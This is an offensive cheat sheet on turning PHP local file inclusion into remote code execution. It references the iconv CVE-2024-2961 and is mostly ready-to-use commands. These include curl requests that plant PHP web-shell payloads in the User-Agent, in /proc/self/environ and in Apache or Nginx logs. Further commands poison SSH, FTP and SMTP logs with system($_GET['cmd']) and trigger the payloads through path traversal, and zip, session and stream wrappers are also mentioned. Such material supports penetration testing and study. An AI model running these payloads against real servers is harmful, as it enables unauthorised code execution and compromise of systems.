LFI 2 RCE

Iconv Filter (CVE-2024-2961)

📚 Resources

• Explanations : Iconv CVE-2024-2961 (Part 1) / Iconv CVE-2024-2961 (Part 2)
• php filters chain
• Hacktricks reference

Tools

• php_filter_chain_generator

RCE /proc/self/environ

Send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file

# curl
curl -A "<?=phpinfo(); ?>" https://example.com/index.php?page=../../../proc/self/environ

Log poisoning

Inject Malicious Payload

/var/log/apache2 & /var/log/nginx/

• Apache : /var/log/apache2/access.log /var/log/apache2/error.log
• Nginx : /var/log/nginx/access.log /var/log/nginx/error.log

Inject via GET parameters or User-Agent headers.

# curl
curl -A "<?php system($_GET['cmd']);?>" https://example.com/index.php?page=../../../var/log/apache2/access.log

Others /var/log/...

SSH: /var/log/auth.log

# Sending the payload via SSH
ssh '<?php phpinfo(); ?>'@$TARGET

FTP: /var/log/vsftpd.log

# Sending the payload via FTP
ftp $TARGET > '<php system($_GET['cmd'])?>'

SMTP: /var/log/mail.log

# Sending the payload via telnet
telnet $TARGET_IP $TARGET_PORT
> MAIL FROM:<john@doe.com>
> RCPT TO:<?php system($_GET['cmd']); ?>

Trigger Execution via LFI

# Accessing the log file via LFI
curl -i $URL/?page=/var/log/auth.log&cmd=id # SSH
curl -i $URL/?page=/var/log/vsftpd.log&cmd=id # FTP
curl -i $URL/?page=/var/log/mail.log&cmd=id # SMTP

Others

RCE via

1. File Upload (e.g., zip, image):

   example.com/?page=zip://file.zip%23rce.php

2. PHP Sessions

3. Wrappers php:// & data://

4. php info phpinfo RCE

Resource

• LFI to RCE
• LFI2RCE Hacktrick